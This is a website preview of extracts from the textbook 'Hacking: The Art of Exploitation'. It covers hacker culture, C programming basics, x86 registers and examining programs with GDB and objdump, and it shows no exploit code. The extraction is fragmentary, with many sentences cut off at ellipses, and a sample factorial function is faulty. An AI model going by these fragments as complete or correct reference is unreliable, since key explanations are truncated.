Search for notes by fellow students, in your own course and all over the country.

Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.

My Basket

Buy These Notes

You have nothing in your shopping cart yet.

Title: Hacking : The Art of Exploitation
Description: Title: Hacking The Art of Exploitation. Edition: 2nd Edition. Author: Jon Erickson.

Buy These Notes Preview

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above

Hacking: The Art of Exploitation, 2nd
Edition
Jon Erickson
Editor
William Pollock
Copyright © 2010

HACKING: THE ART OF EXPLOITATION, 2ND EDITION
...

All rights reserved
...

Printed on recycled paper in the United States of America
11 10 09 08 07
1 2 3 4 5 6 7 8 9
ISBN-10: 1-59327-144-1
ISBN-13: 978-1-59327-144-2
Publisher:

William Pollock

Production Editors:

Christina Samuell and Megan Dunchak

Cover Design:

Octopod Studios

Developmental Editor: Tyler Ortman
Technical Reviewer:

Aaron Adams

Copyeditors:

Dmitry Kirsanov and Megan Dunchak

Compositors:

Christina Samuell and Kathleen Mish

Proofreader:

Jim Brook

Indexer:

Nancy Guenther

For information on book distributors or translations, please contact No Starch
Press, Inc
...

555 De Haro Street, Suite 250, San Francisco, CA 94107
phone: 415
...
9900; fax: 415
...
9950; info@nostarch
...
nostarch
...
-- 2nd ed
...
cm
...
Computer security
...
Computer hackers
...
Computer networks--Security measures
...
Title
...
9
...
8--dc22
2007042910

No Starch Press and the No Starch Press logo are registered trademarks of No
Starch Press, Inc
...
Rather than use a trademark symbol
with every occurrence of a trademarked name, we are using the names only in an
editorial fashion and to the benefit of the trademark owner, with no intention of
infringement of the trademark
...

While every precaution has been taken in the preparation of this work, neither
the author nor No Starch Press, Inc
...

ACKNOWLEDGMENTS
I would like to thank Bill Pollock and everyone else at No Starch Press for making
this book a possibility and allowing me to have so much creative control in the
process
...
Seidel
for keeping me interested in the science of computer science, my parents for
buying that first Commodore VIC-20, and the hacker community for the
innovation and creativity that produced the techniques explained in this book
...
Understanding
hacking techniques is often difficult, since it requires both breadth and depth of
knowledge
...
This second edition of Hacking: The Art of
Exploitation makes the world of hacking more accessible by providing the complete
picture—from programming to machine code to exploitation
...

This CD contains all the source code in the book and provides a development and
exploitation environment you can use to follow along with the book's examples
and experiment along the way
...
INTRODUCTION
The idea of hacking may conjure stylized images of electronic vandalism,
espionage, dyed hair, and body piercings
...
Granted, there are people out there who use hacking techniques to
break the law, but hacking isn't really about that
...
The essence of hacking is finding unintended
or overlooked uses for the laws and properties of a given situation and then
applying them in new and inventive ways to solve a problem—whatever it may be
...
Each number must be used once and only once, and you may
define the order of operations; for example, 3 * (4 + 6) + 1 = 31 is valid,
however incorrect, since it doesn't total 24
...
Like the solution to this problem (shown on the last page of this book),
hacked solutions follow the rules of the system, but they use those rules in
counterintuitive ways
...

Since the infancy of computers, hackers have been creatively solving problems
...
The club's members used this equipment to rig up a
complex system that allowed multiple operators to control different parts of the
track by dialing in to the appropriate sections
...
The group moved on to programming on punch cards and ticker
tape for early computers like the IBM 704 and the TX-0
...
A new program that
could achieve the same result as an existing one but used fewer punch cards was
considered better, even though it did the same thing
...

Being able to reduce the number of punch cards needed for a program showed an
artistic mastery over the computer
...
Early
hackers proved that technical problems can have artistic solutions, and they
thereby transformed programming from a mere engineering task into an art
form
...
The few who got
it formed an informal subculture that remained intensely focused on learning and
mastering their art
...
Such obstructions
included authority figures, the bureaucracy of college classes, and discrimination
...
This drive to continually
learn and explore transcended even the conventional boundaries drawn by
discrimination, evident in the MIT model railroad club's acceptance of 12-year-old
Peter Deutsch when he demonstrated his knowledge of the TX-0 and his desire to
learn
...

The original hackers found splendor and elegance in the conventionally dry
sciences of math and electronics
...
Their desire to dissect
and understand wasn't intended to demystify artistic endeavors; it was simply a
way to achieve a greater appreciation of them
...

This is not a new cultural trend; the Pythagoreans in ancient Greece had a similar
ethic and subculture, despite not owning computers
...
That thirst for
knowledge and its beneficial byproducts would continue on through history, from
the Pythagoreans to Ada Lovelace to Alan Turing to the hackers of the MIT model
railroad club
...

How does one distinguish between the good hackers who bring us the wonders of
technological advancement and the evil hackers who steal our credit card
numbers? The term cracker was coined to distinguish evil hackers from the good
ones
...
Hackers stayed true to the Hacker Ethic, while
crackers were only interested in breaking the law and making a quick buck
...
Cracker was meant to be the catch-all label for anyone doing anything
unscrupulous with a computer— pirating software, defacing websites, and worst
of all, not understanding what they were doing
...

The term's lack of popularity might be due to its confusing etymology— cracker
originally described those who crack software copyrights and reverse engineer

copy-protection schemes
...
Few technology
journalists feel compelled to use terms that most of their readers are unfamiliar
with
...

Similarly, the term script kiddie is sometimes used to refer to crackers, but it just
doesn't have the same zing as the shadowy hacker
...

The current laws restricting cryptography and cryptographic research further
blur the line between hackers and crackers
...
This
paper responded to a challenge issued by the Secure Digital Music Initiative
(SDMI) in the SDMI Public Challenge, which encouraged the public to attempt to
break these watermarking schemes
...
The Digital Millennium
Copyright Act (DCMA) of 1998 makes it illegal to discuss or provide technology
that might be used to bypass industry consumer controls
...
He had
written software to circumvent overly simplistic encryption in Adobe software and
presented his findings at a hacker convention in the United States
...
Under the law, the
complexity of the industry consumer controls doesn't matter—it would be
technically illegal to reverse engineer or even discuss Pig Latin if it were used as
an industry consumer control
...

The sciences of nuclear physics and biochemistry can be used to kill, yet they also
provide us with significant scientific advancement and modern medicine
...
Even if we wanted to, we couldn't suppress the knowledge of how to
convert matter into energy or stop the continued technological progress of
society
...
Hackers will constantly be pushing the limits of
knowledge and acceptable behavior, forcing us to explore further and further
...
Just as
the speedy gazelle adapted from being chased by the cheetah, and the cheetah
became even faster from chasing the gazelle, the competition between hackers

provides computer users with better and stronger security, as well as more
complex and sophisticated attack techniques
...
The defending hackers create IDSs to add to their arsenal, while the
attacking hackers develop IDS-evasion techniques, which are eventually
compensated for in bigger and better IDS products
...

The intent of this book is to teach you about the true spirit of hacking
...
Included with this book is a bootable LiveCD
containing all the source code used herein as well as a preconfigured Linux
environment
...
The only requirement is
an x86 processor, which is used by all Microsoft Windows machines and the newer
Macintosh computers—just insert the CD and reboot
...
This way, you will gain a hands-on understanding and
appreciation for hacking that may inspire you to improve upon existing techniques
or even to invent new ones
...

Chapter 0x200
...
Even
though these two groups of hackers have different end goals, both groups use
similar problem-solving techniques
...
There are interesting hacks found in both the
techniques used to write elegant code and the techniques used to exploit
programs
...

The hacks found in program exploits usually use the rules of the computer to
bypass security in ways never intended
...

There are actually an infinite number of programs that can be written to
accomplish any given task, but most of these solutions are unnecessarily large,
complex, and sloppy
...

Programs that have these qualities are said to have elegance, and the clever and
inventive solutions that tend to lead to this efficiency are called hacks
...

In the business world, more importance is placed on churning out functional code
than on achieving clever hacks and elegance
...
While time and memory
optimizations go without notice by all but the most sophisticated of users, a new
feature is marketable
...

True appreciation of programming elegance is left for the hackers: computer
hobbyists whose end goal isn't to make a profit but to squeeze every possible bit
of functionality out of their old Commodore 64s, exploit writers who need to write
tiny and amazing pieces of code to slip through narrow security cracks, and
anyone else who appreciates the pursuit and the challenge of finding the best
possible solution
...
Since an understanding of programming is a prerequisite to
understanding how programs can be exploited, programming is a natural starting
point
...
A program is nothing more
than a series of statements written in a specific language
...

Driving directions, cooking recipes, football plays, and DNA are all types of
programs
...
Continue on Main Street until you see
a church on your right
...
Otherwise, you can just continue and make a right on 16th Street
...
Drive straight
down Destination Road for 5 miles, and then you'll see the house on the right
...

Anyone who knows English can understand and follow these driving directions,
since they're written in English
...

But a computer doesn't natively understand English; it only understands machine
language
...
However, machine language is arcane and difficult to work
with—it consists of raw bits and bytes, and it differs from architecture to
architecture
...
Programming like this is
painstaking and cumbersome, and it is certainly not intuitive
...
An assembler is one form of machine-language translator—it is a
program that translates assembly language into machine-readable code
...
However, assembly
language is still far from intuitive
...
Just as machine language for Intel x86
processors is different from machine language for Sparc processors, x86 assembly
language is different from Sparc assembly language
...
If a program is written in x86 assembly language, it
must be rewritten to run on Sparc architecture
...

These problems can be mitigated by yet another form of translator called a
compiler
...
Highlevel languages are much more intuitive than assembly language and can be
converted into many different types of machine language for different processor
architectures
...
C, C++, and
Fortran are all examples of high-level languages
...

Pseudo-code
Programmers have yet another form of programming language called pseudocode
...
It isn't understood by compilers, assemblers, or any
computers, but it is a useful way for a programmer to arrange instructions
...
It's sort of the nebulous missing link between English and high-level
programming languages like C
...

Control Structures
Without control structures, a program would just be a series of instructions
executed in sequential order
...
The driving
directions included statements like, Continue on Main Street until you see a church on your
right and If the street is blocked because of construction…
...

If-Then-Else
In the case of our driving directions, Main Street could be under construction
...
Otherwise, the
original set of instructions should be followed
...
In general, it looks something like this:
If (condition) then
{
Set of instructions to execute if the condition is met;

}
Else
{
Set of instruction to execute if the condition is not met;
}

For this book, a C-like pseudo-code will be used, so every instruction will end with
a semicolon, and the sets of instructions will be grouped with curly braces and
indentation
...
In C and many
other programming languages, the then keyword is implied and therefore left out,
so it has also been omitted in the preceding pseudo-code
...
These types of syntactical differences in

programming languages are only skin deep; the underlying structure is still the
same
...
Since C will
be used in the later sections, the pseudo code used in this book will follow a C-like
syntax, but remember that pseudo-code can take on many forms
...
For the
sake of readability, it's still a good idea to indent these instructions, but it's not
syntactically necessary
...

If (there is only one instruction in a set of instructions)
The use of curly braces to group the instructions is optional;
Else
{
The use of curly braces is necessary;
Since there must be a logical way to group these instructions;
}

Even the description of a syntax itself can be thought of as a simple program
...

While/Until Loops
Another elementary programming concept is the while control structure, which is
a type of loop
...
A program can accomplish this task through looping, but it requires a
set of conditions that tells it when to stop looping, lest it continue into infinity
...
A simple program for a hungry mouse could look something like this:
While (you are hungry)
{
Find some food;
Eat the food;
}

The set of two instructions following the while statement will be repeated while the
mouse is still hungry
...
Similarly, the number of times the set
of instructions in the while statement is executed changes depending on how
much food the mouse finds
...
An until loop is simply a
while loop with the conditional statement inverted
...
The driving
directions from before contained the statement Continue on Main Street until you see a
church on your right
...

While (there is not a church on the right)
Drive down Main Street;

For Loops
Another looping control structure is the for loop
...
The driving
direction Drive straight down Destination Road for 5 miles could be converted to a for loop
that looks something like this:
For (5 iterations)
Drive straight for 1 mile;

In reality, a for loop is just a while loop with a counter
...
The first section declares the counter and sets
it to its initial value, in this case 0
...
The third

and final section describes what action should be taken on the counter during
each iteration
...

Using all of the control structures, the driving directions from What Is
Programming? can be converted into a C-like pseudo-code that looks something
like this:
Begin going East on Main Street;
While (there is not a church on the right)
Drive down Main Street;
If (street is blocked)
{
Turn right on 15th Street;
Turn left on Pine Street;
Turn right on 16th Street;
}
Else
Turn right on 16th Street;
Turn left on Destination Road;
For (i=0; i<5; i++)
Drive straight for 1 mile;
Stop at 743 Destination Road;

More Fundamental Programming Concepts
In the following sections, more universal programming concepts will be
introduced
...
As I introduce these concepts, I will integrate them into
pseudo-code examples using C-like syntax
...

Variables
The counter used in the for loop is actually a type of variable
...

There are also variables that don't change, which are aptly called constants
...
In pseudo code, variables are simple
abstract concepts, but in C (and in many other languages), variables must be
declared and given a type before they can be used
...
Like a cooking recipe that
lists all the required ingredients before giving the instructions, variable
declarations allow you to make preparations before getting into the meat of the
program
...
In the
end though, despite all of the variable type declarations, everything is all just
memory
...
Some of the most common types are int (integer
values), float (decimal floating-point values), and char (single character values)
...

int a, b;
float k;
char z;

The variables a and b are now defined as integers, k can accept floating point
values (such as 3
...

Variables can be assigned values when they are declared or anytime afterward,
using the = operator
...
14;
z = 'w';
b = a + 5;

After the following instructions are executed, the variable a will contain the value

of 13, k will contain the number 3
...
Variables are simply a way to
remember values; however, with C, you must first declare each variable's type
...
In C,
the following symbols are used for various arithmetic operations
...
Modulo reduction may seem like a
new concept, but it's really just taking the remainder after division
...

Also, since the variables a and b are integers, the statement b = a / 5 will result
in the value of 2 being stored in b, since that's the integer portion of it
...
6
...
The C
language also provides several forms of shorthand for these arithmetic
operations
...

Full Expression Short hand Explanat ion
i = i + 1

i++ or ++i

Add 1 to the variable
...

These shorthand expressions can be combined with other arithmetic operations to
produce more complex expressions
...
The first expression means Increment the value of i by 1 after
evaluating the arithmetic operation, while the second expression means Increment the value
of i by 1 before evaluating the arithmetic operation
...

int a, b;
a = 5;
b = a++ * 6;

At the end of this set of instructions, b will contain 30 and a will contain 6, since
the shorthand of b = a++ * 6; is equivalent to the following statements:
b = a * 6;
a = a + 1;

However, if the instruction b = ++a * 6; is used, the order of the addition to a
changes, resulting in the following equivalent instructions:
a = a + 1;
b = a * 6;

Since the order has changed, in this case b will contain 36, and a will still contain
6
...
For example, you
might need to add an arbitrary value like 12 to a variable, and store the result
right back in that variable (for example, i = i + 12)
...

Full Expression Short hand Explanat ion
i = i + 12

i+=12

Add some value to the variable
...

i = i * 12

i*=12

Multiply some value by the variable
...

Comparison Operators
Variables are frequently used in the conditional statements of the previously
explained control structures
...
In C, these comparison operators use a shorthand syntax that
is fairly common across many programming languages
...
This is an important distinction, since the
double equal sign is used to test equivalence, while the single equal sign is used to
assign a value to a variable
...
(Some
programming languages like Pascal actually use := for variable assignment to
eliminate visual confusion
...
This symbol can be used by itself to invert any expression
...

Logic Symbol Example
OR

||

AND &&

((a < b) || (a < c))

((a < b) && !(a < c))

The example statement consisting of the two smaller conditions joined with OR
logic will fire true if a is less than b, OR if a is less than c
...
These statements should be
grouped with parentheses and can contain many different variations
...
Returning to the example of the mouse searching for food, hunger can
be translated into a Boolean true/false variable
...

While (hungry == 1)
{
Find some food;
Eat the food;
}

Here's another shorthand used by programmers and hackers quite often
...
In fact, the comparison
operators will actually return a value of 1 if the comparison is true and a value of
0 if it is false
...
Since the program only uses
these two cases, the comparison operator can be dropped altogether
...

While ((hungry) && !(cat_present))
{
Find some food;
If(!(food_is_on_a_mousetrap))
Eat the food;
}

This example assumes there are also variables that describe the presence of a cat
and the location of the food, with a value of 1 for true and 0 for false
...

Functions
Sometimes there will be a set of instructions the programmer knows he will need
several times
...
In other languages, functions are known as subroutines or
procedures
...

The driving directions from the beginning of this chapter require quite a few
turns; however, listing every little instruction for every turn would be tedious (and
less readable)
...
In this case, the function is passed the
direction of the turn
...
When a
program that knows about this function needs to turn, it can just call this function
...
Either left or right can be passed into this
function, which causes the function to turn in that direction
...
For those familiar with
functions in mathematics, this makes perfect sense
...

In C, functions aren't labeled with a "function" keyword; instead, they are
declared by the data type of the variable they are returning
...
If a function is meant to return an integer
(perhaps a function that calculates the factorial of some number x), the function
could look like this:
int factorial(int x)
{
int i;
for(i=1; i < x; i++)
x *= i;
return x;
}

This function is declared as an integer because it multiplies every value from 1 to
x and returns the result, which is an integer
...
This
factorial function can then be used like an integer variable in the main part of any
program that knows about it
...

Also in C, the compiler must "know" about functions before it can use them
...
A function prototype is simply a way to tell
the compiler to expect a function with this name, this return data type, and these
data types as its functional arguments
...
An example of a function prototype for the factorial()
function would look something like this:
int factorial(int);

Usually, function prototypes are located near the beginning of a program
...
The only thing the compiler cares about is the function's
name, its return data type, and the data types of its functional arguments
...
However, the

turn() function doesn't yet capture all the functionality that our driving
directions need
...
This means that a turning function should have two variables: the direction
to turn and the street to turn on to
...
A more complete
turning function using proper C-like syntax is listed below in pseudo-code
...
It will continue to look for
and read street signs until the target street is found; at that point, the remaining
turning instructions will be executed
...

Begin going East on Main Street;
while (there is not a church on the right)
Drive down Main Street;
if (street is blocked)
{
Turn(right, 15th Street);
Turn(left, Pine Street);
Turn(right, 16th Street);
}
else
Turn(right, 16th Street);
Turn(left, Destination Road);
for (i=0; i<5; i++)
Drive straight for 1 mile;
Stop at 743 Destination Road;

Functions aren't commonly used in pseudo-code, since pseudo-code is mostly used
as a way for programmers to sketch out program concepts before writing
compilable code
...
But in a programming language like C, functions are used heavily
...

Getting Your Hands Dirty
Now that the syntax of C feels more familiar and some fundamental programming
concepts have been explained, actually programming in C isn't that big of a step
...
Linux is a free operating system that everyone has access to, and
x86-based processors are the most popular consumer-grade processor on the
planet
...

Included with this book is a Live CD you can use to follow along if your computer
has an x86 processor
...
It
will boot into a Linux environment without modifying your existing operating
system
...

Let's get right to it
...
c program is a simple piece of C code that will
print "Hello, world!" 10 times
...
c
#include ...

{
puts("Hello, world!\n"); // put the string to the output
...

}

The main execution of a C program begins in the aptly named main()function
...

The first line may be confusing, but it's just C syntax that tells the compiler to
include headers for a standard input/output (I/O) library named stdio
...
It is located at
/usr/include/stdio
...
Since the main() function
uses the printf() function from the standard I/O library, a function prototype is
needed for printf() before it can be used
...
h header file
...
The rest of the code should make sense and

look a lot like the pseudo-code from before
...
It should be fairly obvious
what this program will do, but let's compile it using GCC and run it just to make
sure
...
The outputted translation is an
executable binary file, which is called a
...
Does the compiled
program do what you thought it would?
reader@hacking:~/booksrc $ gcc firstprog
...
out
-rwxr-xr-x 1 reader reader 6621 2007-09-06 22:16 a
...
/a
...
Most introductory programming classes just teach how to
read and write C
...
Most programmers learn the language from the top down and never see
the big picture
...
To see the bigger picture in the realm of programming,
simply realize that C code is meant to be compiled
...
Thinking of C-source as
a program is a common misconception that is exploited by hackers every day
...
out's instructions are written in machine language, an elementary
language the CPU can understand
...
In this case, the processor is in a family that uses the x86
architecture
...

Each architecture has a different machine language, so the compiler acts as a
middle ground—translating C code into machine language for the target
architecture
...
But a hacker realizes that the compiled program is

what actually gets executed out in the real world
...
We
have seen the source code for our first program and compiled it into an
executable binary for the x86 architecture
...
Let's start by looking at the machine
code the main() function was translated into
...
out | grep -A20 main
...
Each byte is represented in
hexadecimal notation, which is a base-16 numbering system
...
Hexadecimal uses 0 through 9 to represent 0 through 9, but it also
uses A through F to represent the values 10 through 15
...

This means a byte has 256 (28) possible values, so each byte can be described
with 2 hexadecimal digits
...
The bits of the machine language instructions must be put somewhere,
and this somewhere is called memory
...

Like a row of houses on a local street, each with its own address, memory can be
thought of as a row of bytes, each with its own memory address
...
Older Intel x86 processors use a 32-bit addressing scheme,

while newer ones use a 64-bit one
...
84467441 x
1019) possible addresses
...

The hexadecimal bytes in the middle of the listing above are the machine
language instructions for the x86 processor
...

But since 0101010110001001111001011000001111101100111100001 … isn't very useful to
anything other than the processor, the machine code is displayed as hexadecimal
bytes and each instruction is put on its own line, like splitting a paragraph into
sentences
...
The instructions on the far
right are in assembly language
...
The instruction
ret is far easier to remember and make sense of than 0xc3 or 11000011
...
This
means that since every processor architecture has different machine language
instructions, each also has a different form of assembly language
...
Exactly how these machine language instructions are
represented is simply a matter of convention and preference
...
The assembly
shown in the output on The Bigger Picture is AT&T syntax, as just about all of
Linux's disassembly tools use this syntax by default
...
The same code can be shown in Intel
syntax by providing an additional command-line option, -M intel, to objdump, as
shown in the output below
...
out | grep -A20 main
...
Regardless of
the assembly language representation, the commands a processor understands
are quite simple
...
These operations move memory around, perform some sort of basic
math, or interrupt the processor to get it to do something else
...
But in the same way millions of books have
been written using a relatively small alphabet of letters, an infinite number of
possible programs can be created using a relatively small collection of machine
instructions
...
Most of the
instructions use these registers to read or write data, so understanding the
registers of a processor is essential to understanding the instructions
...

The x86 Processor
The 8086 CPU was the first x86 processor
...
If you remember people talking about 386 and
486 processors in the '80s and '90s, this is what they were referring to
...
I could just talk abstractly about these registers now, but I think it's
always better to see things for yourself
...
Debuggers are used by programmers to step through
compiled programs, examine program memory, and view processor registers
...

Similar to a microscope, a debugger allows a hacker to observe the microscopic
world of machine code—but a debugger is far more powerful than this metaphor
allows
...

Below, GDB is used to show the state of the processor registers right before the
program starts
...
/a
...
so
...

(gdb) break main

Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $

A breakpoint is set on the main() function so execution will stop right before our
code is executed
...

The first four registers (EAX, ECX, EDX, and EBX) are known as general purpose
registers
...
They are used for a variety of purposes, but they mainly act as
temporary variables for the CPU when it is executing machine instructions
...
These stand for
Stack Pointer, Base Pointer, Source Index, and Destination Index, respectively
...
These registers are fairly important
to program execution and memory management; we will discuss them more later
...

There are load and store instructions that use these registers, but for the most
part, these registers can be thought of as just simple general-purpose registers
...
Like a child pointing his finger at each word
as he reads, the processor reads each instruction using the EIP register as its
finger
...
Currently, it points to a memory address at 0x804838a
...
The actual memory is split into

several different segments, which will be discussed later, and these registers keep
track of that
...

Assembly Language
Since we are using Intel syntax assembly language for this book, our tools must be
configured to use this syntax
...
You
can configure this setting to run every time GDB starts up by putting the
command in the file
...

reader@hacking:~/booksrc $ gdb -q
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc $ echo "set dis intel" > ~/
...
gdbinit
set dis intel
reader@hacking:~/booksrc $

Now that GDB is configured to use Intel syntax, let's begin understanding it
...
The operations are usually intuitive mnemonics: The movoperation will
move a value from the source to the destination, sub will subtract, inc will
increment, and so forth
...

8048375: 89 e5 mov ebp,esp
8048377: 83 ec 08 sub esp,0x8

There are also operations that are used to control the flow of execution
...
The example below first compares a 4-byte value located at EBP
minus 4 with the number 9
...
If that value is less than
or equal to 9, execution jumps to the instruction at 0x8048393
...
If the value
isn't less than or equal to 9, execution will jump to 0x80483a6
...

The -g flag can be used by the GCC compiler to include extra debugging
information, which will give GDB access to the source code
...
c
reader@hacking:~/booksrc $ ls -l a
...
out
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/libthread_db
...
1"
...
h>
2
3 int main()
4 {
5 int i;
6 for(i=0; i < 10; i++)
7 {
8 printf("Hello, world!\n");
9 }
10 }
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384 : push ebp
0x08048385 : mov ebp,esp
0x08048387 : sub esp,0x8
0x0804838a : and esp,0xfffffff0
0x0804838d : mov eax,0x0
0x08048392 : sub esp,eax
0x08048394 : mov DWORD PTR [ebp-4],0x0

0x0804839b : cmp DWORD PTR [ebp-4],0x9
0x0804839f : jle 0x80483a3
0x080483a1 : jmp 0x80483b6
0x080483a3 : mov DWORD PTR [esp],0x80484d4
0x080483aa : call 0x80482a8 <_init+56>
0x080483af : lea eax,[ebp-4]
0x080483b2 : inc DWORD PTR [eax]
0x080483b4 : jmp 0x804839b
0x080483b6 : leave
0x080483b7 : ret
End of assembler dump
...
c, line 6
...
out
Breakpoint 1, main() at firstprog
...
Then a breakpoint is set at the start of main(), and the program is run
...
Since the breakpoint has been set at the start of the
main() function, the program hits the breakpoint and pauses before actually
executing any instructions in main()
...

Notice that EIP contains a memory address that points to an instruction in the

main() function's disassembly (shown in bold)
...
Part of the reason variables need to be declared in C is to aid the
construction of this section of code
...
We'll talk more about
the function prologue later, but for now we can take a cue from GDB and skip it
...
Examining memory is a critical skill for any
hacker
...
In both magic
and hacking, if you were to look in just the right spot, the trick would be obvious
...
But
with a debugger like GDB, every aspect of a program's execution can be
deterministically examined, paused, stepped through, and repeated as often as
needed
...

The examine command in GDB can be used to look at a certain address of memory
in a variety of ways
...

The display format also uses a single-letter shorthand, which is optionally
preceded by a count of how many items to examine
...

x Display in hexadecimal
...

t Display in binary
...
In the following example, the current address of the EIP register is used
...

gdb) i r eip
eip 0x8048384 0x8048384
(gdb) x/o 0x8048384
0x8048384 : 077042707
(gdb) x/x $eip
0x8048384 : 0x00fc45c7
(gdb) x/u $eip
0x8048384 : 16532935
(gdb) x/t $eip
0x8048384 : 00000000111111000100010111000111
(gdb)

The memory the EIP register is pointing to can be examined by using the address
stored in EIP
...
The value 077042707 in octal
is the same as 0x00fc45c7 in hexadecimal, which is the same as 16532935 in base10 decimal, which in turn is the same as 00000000111111000100010111000111 in
binary
...

(gdb) x/2x $eip
0x8048384 : 0x00fc45c7 0x83000000
(gdb) x/12x $eip
0x8048384 : 0x00fc45c7 0x83000000 0x7e09fc7d 0xc713eb02
0x8048394 : 0x84842404 0x01e80804 0x8dffffff 0x00fffc45
0x80483a4 : 0xc3c9e5eb 0x90909090 0x90909090 0x5de58955
(gdb)

The default size of a single unit is a four-byte unit called a word
...
The valid size letters are as follows:
A single byte
h A halfword, which is two bytes in size
w A word, which is four bytes in size
g A giant, which is eight bytes in size
b

This is slightly confusing, because sometimes the term word also refers to 2-byte
values
...
In this book,
words and DWORDs both refer to 4-byte values
...
The following GDB output shows memory
displayed in various sizes
...
The first
examine command shows the first eight bytes, and naturally, the examine
commands that use bigger units display more data in total
...
This same byte-reversal effect can be seen when a full four-byte
word is shown as 0x00fc45c7, but when the first four bytes are shown byte by
byte, they are in the order of 0xc7, 0x45, 0xfc, and 0x00
...
For example, if four bytes
are to be interpreted as a single value, the bytes must be used in reverse order
...
Revisiting these values displayed both as hexadecimal and
unsigned decimals might help clear up any confusion
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $ bc -ql
199*(256^3) + 69*(256^2) + 252*(256^1) + 0*(256^0)
3343252480
0*(256^3) + 252*(256^2) + 69*(256^1) + 199*(256^0)
16532935
quit
reader@hacking:~/booksrc $

The first four bytes are shown both in hexadecimal and standard unsigned
decimal notation
...
The byte order of a given architecture is an important
detail to be aware of
...

In addition to converting byte order, GDB can do other conversions with the
examine command
...
The examine
command also accepts the format letter i, short for instruction, to display the
memory as disassembled assembly language instructions
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x8048384: file firstprog
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:6
6 for(i=0; i < 10; i++)
(gdb) i r $eip
eip 0x8048384 0x8048384
(gdb) x/i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
(gdb) x/3i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
0x804838b : cmp DWORD PTR [ebp-4],0x9
0x804838f : jle 0x8048393
(gdb) x/7xb $eip
0x8048384 : 0xc7 0x45 0xfc 0x00 0x00 0x00 0x00
(gdb) x/i $eip
0x8048384 : mov DWORD PTR [ebp-4],0x0
(gdb)

In the output above, the a
...
Since the EIP register is pointing to memory that actually contains
machine language instructions, they disassemble quite nicely
...

8048384: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-4],0x0

This assembly instruction will move the value of 0 into memory located at the
address stored in the EBP register, minus 4
...
Basically, this command will zero out the variable i for the for
loop
...
The memory at this location can be examined several different ways
...
The
examine command can examine this memory address directly or by doing the
math on the fly
...
This variable named $1
can be used later to quickly re-access a particular location in memory
...

Let's execute the current instruction using the command nexti, which is short for
next instruction
...

(gdb) nexti
0x0804838b 6 for(i=0; i < 10; i++)
(gdb) x/4xb $1
0xbffff804: 0x00 0x00 0x00 0x00
(gdb) x/dw $1
0xbffff804: 0
(gdb) i r eip
eip 0x804838b 0x804838b
(gdb) x/i $eip
0x804838b : cmp DWORD PTR [ebp-4],0x9

(gdb)

As predicted, the previous command zeroes out the 4 bytes found at EBP minus 4,
which is memory set aside for the C variable i
...
The next few instructions actually make more sense to talk about in a
group
...
The next instruction, jle
stands for jump if less than or equal to
...
In this case the instruction says to jump to the
address 0x8048393 if the value stored in memory for the C variable i is less than
or equal to the value 9
...
This will cause the EIP to
jump to the address 0x80483a6
...
The first address of
0x8048393 (shown in bold) is simply the instruction found after the fixed jump
instruction, and the second address of 0x80483a6 (shown in italics) is located at
the end of the function
...

(gdb) nexti
0x0804838f 6 for(i=0; i < 10; i++)
(gdb) x/i $eip
0x804838f : jle 0x8048393
(gdb) nexti
8 printf("Hello, world!\n");
(gdb) i r eip
eip 0x8048393 0x8048393
(gdb) x/2i $eip
0x8048393 : mov DWORD PTR [esp],0x8048484
0x804839a : call 0x80482a0
(gdb)

As expected, the previous two instructions let the program execution flow down to

0x8048393, which brings us to the next two instructions
...
But what is ESP pointing to?

(gdb) i r esp
esp 0xbffff800 0xbffff800
(gdb)

Currently, ESP points to the memory address 0xbffff800, so when the mov
instruction is executed, the address 0x8048484 is written there
...

(gdb) x/2xw 0x8048484
0x8048484: 0x6c6c6548 0x6f57206f
(gdb) x/6xb 0x8048484
0x8048484: 0x48 0x65 0x6c 0x6c 0x6f 0x20
(gdb) x/6ub 0x8048484
0x8048484: 72 101 108 108 111 32
(gdb)

A trained eye might notice something about the memory here, in particular the
range of the bytes
...
These bytes fall within the printable ASCII
range
...
The bytes 0x48, 0x65, 0x6c,
and 0x6f all correspond to letters in the alphabet on the ASCII table shown below
...

ASCII Table

Oct Dec Hex Char Oct Dec Hex Char
-----------------------------------------------------------000 0 00 NUL '\0' 100 64 40 @
001 1 01 SOH 101 65 41 A
002 2 02 STX 102 66 42 B
003 3 03 ETX 103 67 43 C
004 4 04 EOT 104 68 44 D
005 5 05 ENQ 105 69 45 E
006 6 06 ACK 106 70 46 F
007 7 07 BEL '\a' 107 71 47 G
010 8 08 BS '\b' 110 72 48 H
011 9 09 HT '\t' 111 73 49 I
012 10 0A LF '\n' 112 74 4A J
013 11 0B VT '\v' 113 75 4B K
014 12 0C FF '\f' 114 76 4C L
015 13 0D CR '\r' 115 77 4D M
016 14 0E SO 116 78 4E N
017 15 0F SI 117 79 4F O
020 16 10 DLE 120 80 50 P
021 17 11 DC1 121 81 51 Q
022 18 12 DC2 122 82 52 R
023 19 13 DC3 123 83 53 S
024 20 14 DC4 124 84 54 T
025 21 15 NAK 125 85 55 U
026 22 16 SYN 126 86 56 V

027 23 17 ETB 127 87 57 W
030 24 18 CAN 130 88 58 X
031 25 19 EM 131 89 59 Y
032 26 1A SUB 132 90 5A Z
033 27 1B ESC 133 91 5B [
034 28 1C FS 134 92 5C \ '\\'
035 29 1D GS 135 93 5D ]
036 30 1E RS 136 94 5E ^
037 31 1F US 137 95 5F _
040 32 20 SPACE 140 96 60 `
041 33 21 ! 141 97 61 a
042 34 22 " 142 98 62 b
043 35 23 # 143 99 63 c
044 36 24 $ 144 100 64 d
045 37 25 % 145 101 65 e
046 38 26 & 146 102 66 f
047 39 27 ' 147 103 67 g
050 40 28 ( 150 104 68 h
051 41 29 ) 151 105 69 i
052 42 2A * 152 106 6A j
053 43 2B + 153 107 6B k
054 44 2C , 154 108 6C l
055 45 2D - 155 109 6D m
056 46 2E
...
The c format letter can be used to automatically look up a byte on
